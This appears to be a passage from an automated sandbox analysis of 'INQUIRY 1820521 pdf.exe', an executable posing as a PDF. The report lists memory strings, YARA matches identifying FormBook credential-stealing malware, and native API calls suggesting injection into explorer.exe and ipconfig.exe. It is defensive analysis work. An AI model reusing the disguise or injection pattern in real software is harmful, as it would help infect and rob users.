          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comTZ
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.coms
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%22xinghai-nb.com%22
          Source: ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmpString found in binary or memory: https://www.sogou.com/web?query=%22xinghai-nb.com%22&ie=utf8
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.680653424.00000000015D8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419D60 NtCreateFile,9_2_00419D60
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419E10 NtReadFile,9_2_00419E10
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419E90 NtClose,9_2_00419E90
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419F40 NtAllocateVirtualMemory,9_2_00419F40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419D5E NtCreateFile,9_2_00419D5E
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419E8C NtClose,9_2_00419E8C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00419F3A NtAllocateVirtualMemory,9_2_00419F3A
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01579910
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015799A0 NtCreateSection,LdrInitializeThunk,9_2_015799A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579840 NtDelayExecution,LdrInitializeThunk,9_2_01579840
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579860 NtQuerySystemInformation,LdrInitializeThunk,9_2_01579860
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015798F0 NtReadVirtualMemory,LdrInitializeThunk,9_2_015798F0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579A50 NtCreateFile,LdrInitializeThunk,9_2_01579A50
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579A00 NtProtectVirtualMemory,LdrInitializeThunk,9_2_01579A00
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579A20 NtResumeThread,LdrInitializeThunk,9_2_01579A20
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579540 NtReadFile,LdrInitializeThunk,9_2_01579540
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015795D0 NtClose,LdrInitializeThunk,9_2_015795D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579710 NtQueryInformationToken,LdrInitializeThunk,9_2_01579710
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579780 NtMapViewOfSection,LdrInitializeThunk,9_2_01579780
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015797A0 NtUnmapViewOfSection,LdrInitializeThunk,9_2_015797A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01579660
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015796E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_015796E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579950 NtQueueApcThread,9_2_01579950
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015799D0 NtCreateProcessEx,9_2_015799D0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157B040 NtSuspendThread,9_2_0157B040
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579820 NtEnumerateKey,9_2_01579820
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015798A0 NtWriteVirtualMemory,9_2_015798A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579B00 NtSetValueKey,9_2_01579B00
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157A3B0 NtGetContextThread,9_2_0157A3B0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579A10 NtQuerySection,9_2_01579A10
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579A80 NtOpenDirectoryObject,9_2_01579A80
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579560 NtWriteFile,9_2_01579560
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157AD30 NtSetContextThread,9_2_0157AD30
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579520 NtWaitForSingleObject,9_2_01579520
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015795F0 NtQueryInformationFile,9_2_015795F0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157A770 NtOpenThread,9_2_0157A770
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579770 NtSetInformationFile,9_2_01579770
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579760 NtOpenProcess,9_2_01579760
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0157A710 NtOpenProcessToken,9_2_0157A710
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579730 NtQueryVirtualMemory,9_2_01579730
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579FE0 NtCreateMutant,9_2_01579FE0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579650 NtQueryValueKey,9_2_01579650
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579670 NtQueryInformationProcess,9_2_01579670
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01579610 NtEnumerateValueKey,9_2_01579610
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015796D0 NtCreateKey,9_2_015796D0
          Source: C:\Windows\explorer.exeCode function: 10_2_04DFAA32 NtCreateFile,10_2_04DFAA32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9710 NtQueryInformationToken,LdrInitializeThunk,16_2_032B9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9780 NtMapViewOfSection,LdrInitializeThunk,16_2_032B9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9FE0 NtCreateMutant,LdrInitializeThunk,16_2_032B9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9A50 NtCreateFile,LdrInitializeThunk,16_2_032B9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_032B96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B96D0 NtCreateKey,LdrInitializeThunk,16_2_032B96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_032B9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9540 NtReadFile,LdrInitializeThunk,16_2_032B9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B99A0 NtCreateSection,LdrInitializeThunk,16_2_032B99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B95D0 NtClose,LdrInitializeThunk,16_2_032B95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_032B9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9840 NtDelayExecution,LdrInitializeThunk,16_2_032B9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9730 NtQueryVirtualMemory,16_2_032B9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9B00 NtSetValueKey,16_2_032B9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032BA710 NtOpenProcessToken,16_2_032BA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9760 NtOpenProcess,16_2_032B9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9770 NtSetInformationFile,16_2_032B9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032BA770 NtOpenThread,16_2_032BA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B97A0 NtUnmapViewOfSection,16_2_032B97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032BA3B0 NtGetContextThread,16_2_032BA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9A20 NtResumeThread,16_2_032B9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9A00 NtProtectVirtualMemory,16_2_032B9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9A10 NtQuerySection,16_2_032B9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9610 NtEnumerateValueKey,16_2_032B9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9660 NtAllocateVirtualMemory,16_2_032B9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9670 NtQueryInformationProcess,16_2_032B9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9650 NtQueryValueKey,16_2_032B9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9A80 NtOpenDirectoryObject,16_2_032B9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9520 NtWaitForSingleObject,16_2_032B9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032BAD30 NtSetContextThread,16_2_032BAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9560 NtWriteFile,16_2_032B9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9950 NtQueueApcThread,16_2_032B9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B95F0 NtQueryInformationFile,16_2_032B95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B99D0 NtCreateProcessEx,16_2_032B99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B9820 NtEnumerateKey,16_2_032B9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032BB040 NtSuspendThread,16_2_032BB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B98A0 NtWriteVirtualMemory,16_2_032B98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032B98F0 NtReadVirtualMemory,16_2_032B98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A19D60 NtCreateFile,16_2_00A19D60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A19E90 NtClose,16_2_00A19E90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A19E10 NtReadFile,16_2_00A19E10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A19D5E NtCreateFile,16_2_00A19D5E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A19E8C NtClose,16_2_00A19E8C
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015921400_2_01592140
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015904700_2_01590470
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01590FD00_2_01590FD0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_0159EE680_2_0159EE68
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015930780_2_01593078
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015917790_2_01591779
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_0159BF400_2_0159BF40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01594AD80_2_01594AD8
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01594AC90_2_01594AC9
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01592F780_2_01592F78
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01590F720_2_01590F72
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01590F290_2_01590F29
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01590ED10_2_01590ED1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015951480_2_01595148
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015951390_2_01595139
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015953590_2_01595359
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015953680_2_01595368
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015956100_2_01595610
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_015956000_2_01595600
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01593F480_2_01593F48
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_01593F380_2_01593F38
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_0159BF300_2_0159BF30
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_056737940_2_05673794
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_05679BC00_2_05679BC0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_056701F00_2_056701F0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_056737E70_2_056737E7
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 0_2_056737880_2_05673788
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_004010299_2_00401029
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00402D879_2_00402D87
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00409E409_2_00409E40
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00409E3B9_2_00409E3B
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0153F9009_2_0153F900
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015541209_2_01554120
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0160E8249_2_0160E824
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015F10029_2_015F1002
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016028EC9_2_016028EC
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154B0909_2_0154B090
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016020A89_2_016020A8
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015620A09_2_015620A0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01602B289_2_01602B28
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FDBD29_2_015FDBD2
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0156EBB09_2_0156EBB0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016022AE9_2_016022AE
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01601D559_2_01601D55
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01602D079_2_01602D07
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01530D209_2_01530D20
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154D5E09_2_0154D5E0
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_016025DD9_2_016025DD
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015625819_2_01562581
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FD4669_2_015FD466
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_0154841F9_2_0154841F
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01601FF19_2_01601FF1
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_015FD6169_2_015FD616
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01556E309_2_01556E30
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 9_2_01602EF79_2_01602EF7
          Source: C:\Windows\explorer.exeCode function: 10_2_04DFAA3210_2_04DFAA32
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF2CF210_2_04DF2CF2
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF2CEC10_2_04DF2CEC
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF107210_2_04DF1072
          Source: C:\Windows\explorer.exeCode function: 10_2_04DFDA6F10_2_04DFDA6F
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF106910_2_04DF1069
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF986210_2_04DF9862
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF5B1F10_2_04DF5B1F
          Source: C:\Windows\explorer.exeCode function: 10_2_04DFDB0E10_2_04DFDB0E
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF813210_2_04DF8132
          Source: C:\Windows\explorer.exeCode function: 10_2_04DF5B2210_2_04DF5B22
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03342B2816_2_03342B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032AEBB016_2_032AEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03341FF116_2_03341FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333DBD216_2_0333DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03296E3016_2_03296E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_033422AE16_2_033422AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03342EF716_2_03342EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03270D2016_2_03270D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0329412016_2_03294120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0327F90016_2_0327F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03342D0716_2_03342D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03341D5516_2_03341D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A258116_2_032A2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328D5E016_2_0328D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0333100216_2_03331002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328841F16_2_0328841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_032A20A016_2_032A20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_033420A816_2_033420A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0328B09016_2_0328B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A02D8716_2_00A02D87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A02D9016_2_00A02D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A09E3B16_2_00A09E3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A09E4016_2_00A09E40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00A02FB016_2_00A02FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0327B150 appears 35 times
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: String function: 0153B150 appears 35 times
          Source: INQUIRY 1820521 pdf.exeBinary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688381627.000000000A140000.00000002.00000001.sdmpBinary or memory string: originalfilename vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688381627.000000000A140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000000.643263157.0000000000D52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690617159.000000000B6A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.688107123.0000000009F10000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.690816411.0000000012120000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.680653424.00000000015D8000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exeBinary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exe, 00000006.00000000.674971623.0000000000392000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFormattableString.exeP vs INQUIRY 1820521 pdf.exe
          Source: INQUIRY 1820521 pdf.exeBinary or memory string: OriginalFilename vs INQUIRY 1820521 pdf.exe
